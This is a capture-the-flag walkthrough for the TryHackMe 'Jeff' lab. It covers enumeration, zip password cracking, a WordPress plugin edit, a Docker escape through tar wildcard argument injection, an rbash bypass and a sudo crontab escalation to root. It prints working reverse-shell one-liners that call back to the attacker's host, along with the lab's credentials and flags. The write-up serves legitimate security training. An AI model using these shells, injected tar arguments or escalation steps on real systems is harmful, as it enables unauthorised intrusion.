TryHackMe-Jeff

From aldeid
Jump to navigation Jump to search

Can you hack Jeff’s web server?

This machine may take upto 5 minutes to fully deploy.

Get user.txt and root.txt.

This is my first ever box, I hope you enjoy it.

If you find yourself brute forcing SSH, you’re doing it wrong.

Please don’t post spoilers or stream the box for at least a couple of days.

Hack the machine and obtain the user.txt flag.

Hint: Add jeff.thm to your /etc/hosts file.

Services enumeration

Let’s start by scanning the machine with Nmap. There are 2 open ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7e:43:5f:1e:58:a8:fc:c9:f7:fd:4b:40:0b:83:79:32 (RSA)
|   256 5c:79:92:dd:e9:d1:46:50:70:f0:34:62:26:f0:69:39 (ECDSA)
|_  256 ce:d9:82:2b:69:5f:82:d0:f5:5c:9b:3e:be:76:88:c3 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As mentioned in the hint, let’s add jeff.thm in our /etc/hosts file:

$ echo "10.10.144.133 jeff.thm" | sudo tee -a /etc/hosts

Web enumeration

Hidden locations

There is no robots.txt file but gobuster discovers several interesting hidden directories (admin, backups and uploads):

[email protected]:/data/Jeff$ gobuster dir -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://jeff.thm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/05 09:45:16 Starting gobuster
===============================================================
/admin (Status: 301)
/assets (Status: 301)
/backups (Status: 301)
/index.html (Status: 200)
/uploads (Status: 301)
===============================================================
2020/09/05 09:45:39 Finished
===============================================================

admin

Further enumerating the /admin directory leads to a login.php page.

[email protected]:/data/Jeff$ gobuster dir -u http://jeff.thm/admin/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://jeff.thm/admin/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,zip,bak,old
[+] Timeout:        10s
===============================================================
2020/09/05 09:51:37 Starting gobuster
===============================================================
/index.html (Status: 200)
/login.php (Status: 200)
===============================================================
2020/09/05 09:53:30 Finished
===============================================================

However, browsing /admin/login.php forces the download of the file, which is empty. Likely a rabbit hole.

uploads

The /uploads directory contains an index.html with a form to upload files on the server. However, there is no action tag in the form, nor any javascript included. Further enumerating the directory doesn’t reveal any other hidden source. This is another rabbit hole.

backups

The /backups/ directory doesn’t allow directory listing, but gobuster found a backup.zip file:

[email protected]:/data/Jeff$ gobuster dir -u http://jeff.thm/backups/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://jeff.thm/backups/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     old,php,zip,bak
[+] Timeout:        10s
===============================================================
2020/09/05 09:49:12 Starting gobuster
===============================================================
/backup.zip (Status: 200)
/index.html (Status: 200)
===============================================================
2020/09/05 09:51:08 Finished

The backup.zip file is likely to contain an interesting wpadmin.bak file, but it is password protected:

[email protected]:/data/Jeff/files$ zipinfo backup.zip 
Archive:  backup.zip
Zip file size: 62753 bytes, number of entries: 9
drwxrwx---  3.0 unx        0 bx stor 20-May-14 17:20 backup/
drwxrwx---  3.0 unx        0 bx stor 20-May-14 17:20 backup/assets/
-rwxrwx---  3.0 unx    34858 TX defN 20-May-14 17:20 backup/assets/EnlighterJS.min.css
-rwxrwx---  3.0 unx    49963 TX defN 20-May-14 17:20 backup/assets/EnlighterJS.min.js
-rwxrwx---  3.0 unx    89614 TX defN 20-May-14 17:20 backup/assets/MooTools-Core-1.6.0-compressed.js
-rwxrwx---  3.0 unx    11524 BX defN 20-May-14 17:20 backup/assets/profile.jpg
-rwxrwx---  3.0 unx     1439 TX defN 20-May-14 17:20 backup/assets/style.css
-rwxrwx---  3.0 unx     1178 TX defN 20-May-14 17:20 backup/index.html
-rwxrwx---  3.0 unx       41 TX stor 20-May-14 17:20 backup/wpadmin.bak
9 files, 188617 bytes uncompressed, 60951 bytes compressed:  67.7%

Let’s crack the password using John the Ripper:

$ /data/src/john/run/zip2john backup.zip > backup.hash
$ /data/src/john/run/john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!Burningbird!!  (backup.zip)
1g 0:00:00:04 DONE (2020-09-05 09:58) 0.2427g/s 3480Kp/s 3480Kc/s 3480KC/s !!rebound!!..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

John found the password to uncompress the archive: !!Burningbird!!. The wpadmin.bak file reveals the Wordpress password.

$ cat wpadmin.bak 
wordpress password is: phO#g)C5dhIWZn3BKP

Question: Is there any Wordpress installation somewhere? Maybe a virtual host?

Another vhost?

Let’s check with gobuster using the vhost brute forcer:

[email protected]:/data/Jeff/files$ gobuster vhost -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:          http://jeff.thm
[+] Threads:      10
[+] Wordlist:     /usr/share/wordlists/dirb/common.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
===============================================================
2020/09/05 10:10:01 Starting gobuster
===============================================================
Found: wordpress.jeff.thm (Status: 200) [Size: 25901]
===============================================================
2020/09/05 10:10:26 Finished
===============================================================

Indeed, there is a wordpress.jeff.thm vhost. Let’s add it to our hosts file.

Wordpress

Let’s enumerate the existing users with wpscan.

[email protected]:/data/Jeff/files$ wpscan --url http://wordpress.jeff.thm -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordpress.jeff.thm/ [10.10.144.133]
[+] Started: Sat Sep  5 10:15:53 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: nginx
 |  - X-Powered-By: PHP/7.3.17
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordpress.jeff.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://wordpress.jeff.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordpress.jeff.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.1 identified (Insecure, released on 2020-04-29).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordpress.jeff.thm/?feed=rss2, <generator>https://wordpress.org/?v=5.4.1</generator>
 |  - http://wordpress.jeff.thm/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.4.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://wordpress.jeff.thm/wp-content/themes/twentytwenty/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://wordpress.jeff.thm/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.5
 | Style URL: http://wordpress.jeff.thm/wp-content/themes/twentytwenty/style.css?ver=1.2
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordpress.jeff.thm/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] jeff
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sat Sep  5 10:15:58 2020
[+] Requests Done: 50
[+] Cached Requests: 6
[+] Data Sent: 11.386 KB
[+] Data Received: 379.327 KB
[+] Memory used: 173.398 MB
[+] Elapsed time: 00:00:05

wpscan revealed a user: jeff. And we already have the password (remember the backup archive?). Let’s connect: http://wordpress.jeff.thm/wp-login.php

Reverse shell

Now connected as jeff (who is admin BTW), we should be able to get a reverse shell.

Unfortunately, we can’t modify the 404.php template from the “Theme Editor” because of the following error:

Something went wrong. Your change may not have been saved. Please try again. There is also a chance that you may need to manually fix and upload the file over FTP.

Let’s try with the plugins. Go to “Plugins > PluginEditor” from the menu. From the dropdown on the right hand side, select “Hello Dolly” and click on the “Select” button. It will show the code for the hello.php template. Append the following content to the file and click on the “Update file” button.

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.50.72/4444 0>&1'");

Now, open a listener (rlwrap nc -nlvp 4444) and activate the plugin (“Plugins > Installed plugins”).

We now have a reverse shell.

Docker evasion

It turns out that we land in a docker container, what is confirmed by leanpeas.sh.

After trying to evade docker and failing due to a lack of permission to execute docker, I decided to exploit something else.

There is an interesting ftp_backup.php script under /var/www/html/:

<?php
/* 
    Todo: I need to finish coding this database backup script.
    also maybe convert it to a wordpress plugin in the future.
*/
$dbFile = 'db_backup/backup.sql';
$ftpFile = 'backup.sql';

$username = "backupmgr";
$password = "SuperS1ckP4ssw0rd123!";

$ftp = ftp_connect("172.20.0.1"); // todo, set up /etc/hosts for the container host

if( ! ftp_login($ftp, $username, $password) ){
    die("FTP Login failed.");
}

$msg = "Upload failed";
if (ftp_put($ftp, $remote_file, $file, FTP_ASCII)) {
    $msg = "$file was uploaded.\n";
}

echo $msg;
ftp_close($conn_id);

Running it will display the error message “Upload failed”, which is a sign that the authentication was successful. Unfortunately, ftp, nc or telnet are not available in the container and we have to use curl (make sure you use the -P - flag to force the active mode).

[email protected]:/var/www/html/wp-admin$ curl -s -v -P - 'ftp://backupmgr:[email protected]/'
<'ftp://backupmgr:[email protected]/'
* Expire in 0 ms for 6 (transfer 0x55e170f67f50)
*   Trying 172.20.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x55e170f67f50)
* Connected to 172.20.0.1 (172.20.0.1) port 21 (#0)
< 220 Welcome to Jeff's FTP service.
> USER backupmgr
< 331 Please specify the password.
> PASS SuperS1ckP4ssw0rd123!
< 230 Login successful.
> PWD
< 257 "/" is the current directory
* Entry path is '/'
> EPRT |1|172.20.0.6|48235|
* ftp_perform ends with SECONDARY: 1
< 200 EPRT command successful. Consider using EPSV.
* Connect data stream actively
> TYPE A
< 200 Switching to ASCII mode.
> LIST
< 150 Here comes the directory listing.
* Maxdownload = -1
* Preparing for accepting server on data port
* Checking for server connect
* Ready to accept data connection from server
* Connection accepted from server
{ [63 bytes data]
* Remembering we are in dir ""
< 226 Directory send OK.
* Connection #0 to host 172.20.0.1 left intact
drwxr-xr-x    2 1001     1001         4096 May 18 16:14 files

The files directory is empty:

[email protected]:/var/www/html/wp-admin$ curl -s -v -P - 'ftp://backupmgr:[email protected]/files/'
</backupmgr:[email protected]/files/'
* Expire in 0 ms for 6 (transfer 0x562eb8f80f50)
*   Trying 172.20.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x562eb8f80f50)
* Connected to 172.20.0.1 (172.20.0.1) port 21 (#0)
< 220 Welcome to Jeff's FTP service.
> USER backupmgr
< 331 Please specify the password.
> PASS SuperS1ckP4ssw0rd123!
< 230 Login successful.
> PWD
< 257 "/" is the current directory
* Entry path is '/'
> CWD files
* ftp_perform ends with SECONDARY: 0
< 250 Directory successfully changed.
> EPRT |1|172.20.0.6|41765|
< 200 EPRT command successful. Consider using EPSV.
* Connect data stream actively
> TYPE A
< 200 Switching to ASCII mode.
> LIST
< 150 Here comes the directory listing.
* Maxdownload = -1
* Preparing for accepting server on data port
* Checking for server connect
* Ready to accept data connection from server
* Connection accepted from server
{ [0 bytes data]
* Remembering we are in dir "files/"
< 226 Directory send OK.
* Connection #0 to host 172.20.0.1 left intact

Crontab?

This is where I was left without ideas, and after a while, I decided to have a quick look at the writeups to see how I could move forward. I could read that “a crontab is running outside the container! The user backupmgr is running tar every minute and uses a wildcard * to include everything in the ftp://files directory”.

Honestly, without any hint (did I miss any?), I don’t know how one could do this kind of assumption, but let’s take it for granted… I stopped reading the write-up and decided to continue exploring myself, with this new “hint”.

Reverse shell (escape the docker container)

Long story short, what we need to do is to push 3 files on the ftp server, under the /files directory in order to inject parameters to the tar command, as described on GTFOBins:

  • shell: a new reverse shell (we will do it in python)
  • --checkpoint=1
  • --checkpoint-action=exec=sh shell: to run our shell

Let’s create the files:

$ echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.50.72\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'" > shell.sh
$ echo "" > "/var/www/html/--checkpoint=1"
$ echo "" > "/var/www/html/--checkpoint-action=exec=sh shell.sh"

And now, let’s upload them to the remote location:

$ curl -v -P - -T "/var/www/html/shell.sh" 'ftp://backupmgr:[email protected]/files/'
$ curl -v -P - -T "/var/www/html/--checkpoint=1" 'ftp://backupmgr:[email protected]/files/'
$ curl -v -P - -T "/var/www/html/--checkpoint-action=exec=sh shell.sh" 'ftp://backupmgr:[email protected]/files/'

Open a new listener and wait 1 minute to get a new shell as backupmgr, outside of the docker container.

$ rlwrap nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.144.133] 43678
bash: cannot set terminal process group (2532): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~/.ftp/files$ id
id
uid=1001(backupmgr) gid=1001(backupmgr) groups=1001(backupmgr)
[email protected]:~/.ftp/files$ 

Let’s immediatly upgrade our shell:

[email protected]:~/.ftp/files$ python -c "import pty;pty.spawn('/bin/bash')"

Lateral move (backupmgr -> jeff)

We are connected as backupmgr, but the user flag is in jeff’s home, that we don’t have access to.

[email protected]:~$ ls -l /home
ls -l /home
total 8
drwxr-xr-x 7 backupmgr backupmgr 4096 May 24 13:25 backupmgr
drwx------ 5 jeff      jeff      4096 May 18 16:09 jeff

Listing files owned by jeff reveals 2 interesting files:

[email protected]:~$ find / -type f -user jeff 2>/dev/null
find / -type f -user jeff 2>/dev/null
/opt/systools/systool
/var/backups/jeff.bak
[email protected]:~$ cat /var/backups/jeff.bak
cat /var/backups/jeff.bak
cat: /var/backups/jeff.bak: Permission denied

Reading jeff.bak would obviously help (likely containing information to switch to the user), but only jeff can read the file. On the other hand, running the systool executable will show a menu:

[email protected]:/opt/systools$ ./systool
./systool
Welcome to Jeffs System Administration tool.
This is still a very beta version and some things are not implemented yet.
Please Select an option from below.
1 ) View process information.
2 ) Restore your password.
3 ) Exit 
Chose your option: 

If we choose the second option (“restore your password”), it will display a message that seems to be taken from the message.txt file in the same directory, and that is writable by anybody:

Chose your option: 2
2


Jeff, you should login with your own account to view/change your password. I hope you haven't forgotten it.


1 ) View process information.
2 ) Restore your password.
3 ) Exit 
Chose your option: 3
3
[email protected]:/opt/systools$ cat message.txt
cat message.txt
Jeff, you should login with your own account to view/change your password. I hope you haven't forgotten it.
[email protected]:/opt/systools$ ls -la message.txt
ls -la message.txt
-rwxrwxrwx 1 root root 108 May 24 13:19 message.txt

Now, what is interesting is that the binary is owned by jeff and the message.txt file is world writable, which means we can make a symbolic link to jeff.bak:

[email protected]:/opt/systools$ ln -sf /var/backups/jeff.bak message.txt
ln -sf /var/backups/jeff.bak message.txt
[email protected]:/opt/systools$ ls -la
ls -la
total 28
drwxrwxrwx 2 jeff      jeff       4096 Sep  6 18:31 .
drwxr-xr-x 4 root      root       4096 May 24 13:13 ..
lrwxrwxrwx 1 backupmgr backupmgr    21 Sep  6 18:31 message.txt -> /var/backups/jeff.bak
-rwxr-sr-x 1 jeff      pwman     17160 May 24 13:18 systool
[email protected]:/opt/systools$ ./systool
./systool
Welcome to Jeffs System Administration tool.
This is still a very beta version and some things are not implemented yet.
Please Select an option from below.
1 ) View process information.
2 ) Restore your password.
3 ) Exit 
Chose your option: 2
2


Your Password is: 123-My-N4M3-1z-J3ff-123 


1 ) View process information.
2 ) Restore your password.
3 ) Exit 
Chose your option: 

We now have jeff’s password and we can connect via SSH. Unfortunately, there is another complexity, we are in a restricted bash (rbash) environment, that prevents us from reading the user flag:

[email protected]:/data/Jeff/files$ ssh [email protected]
[email protected]:~$ cat user.txt
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names

Evade the restricted shell (rbash)

After some research on the Internet, I eventually found that appending -t "bash -l" to the SSH connection string allows to bypass the restricted bash.

[email protected]:/data/Jeff/files$ ssh [email protected] -t "bash -l"
Warning: Permanently added the ECDSA host key for IP address '10.10.144.133' to the list of known hosts.
[email protected]'s password: 
[email protected]:~$ ls -l
total 4
-rw-r----- 1 jeff jeff 36 May 11 12:04 user.txt

After manually defining some paths in the PATH environment variable, I was able to eventually read the user flag.

[email protected]:~$ cat user.txt
Command 'cat' is available in '/bin/cat'
The command could not be located because '/bin' is not included in the PATH environment variable.
cat: command not found
[email protected]:~$ echo $PATH
/home/jeff/.bin
[email protected]:~$ export PATH=/bin:/usr/bin:/usr/sbin:/usr/local/bin
[email protected]:~$ echo $PATH
/bin:/usr/bin:/usr/sbin:/usr/local/bin
[email protected]:~$ cat user.txt
THM{HashMeLikeOneOfYourFrenchGirls}

I tried to validate the user flag but it failed.

User flag

The flag seems to be hashed (HashMeLikeOneOfYourFrenchGirls) with MD5:

[email protected]:~$ echo -n "HashMeLikeOneOfYourFrenchGirls" | md5sum
e122d5588956ef9ba7d4d2b2fee00cac  -

User flag: THM{e122d5588956ef9ba7d4d2b2fee00cac}

Escalate your privileges, whats the root flag?

Jeff’s privileges

After so many difficulties to get the user flag, I was not expecting anything from the sudo -l command, but was surprised to see that jeff was allowed to run crontab as root without password.

[email protected]:~$ sudo -l
[sudo] password for jeff: 
Matching Defaults entries for jeff on tryharder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jeff may run the following commands on tryharder:
    (ALL) /usr/bin/crontab

Crontab

Let’s edit the crontab with sudo crontab -e and add the following line:

* * * * * python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Now, open a listener and wait 1 minute to get a root shell:

[email protected]:/data/vpn$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.144.133] 44900
bash: cannot set terminal process group (2476): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~# ls -la
ls -la
total 44
drwx------  6 root root 4096 May 25 15:46 .
drwxr-xr-x 25 root root 4096 May 23 14:40 ..
lrwxrwxrwx  1 root root    9 May 11 12:34 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 May 12 16:31 .cache
drwx------  3 root root 4096 May 12 16:31 .gnupg
drwxr-xr-x  3 root root 4096 May 14 14:00 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
----------  1 root root  117 May 18 11:59 root.txt
-rw-r--r--  1 root root   75 May 11 13:29 .selected_editor
drwx------  2 root root 4096 May 18 12:28 .ssh
-rw-------  1 root root 1880 May 25 15:46 .viminfo

Root flag

And access the root flag:

[email protected]:~# cat root.txt
cat root.txt
THM{40fc54e5c0f5747dfdd35e0cc7db6ee2}

Congratz on completing my box. 
Sorry if you hated it, it was my first one :)

Root flag: THM{40fc54e5c0f5747dfdd35e0cc7db6ee2}

Comments

blog comments powered by Disqus

Keywords: ctf tryhackme backup vhost wordpress wpscan docker curl ftp rbash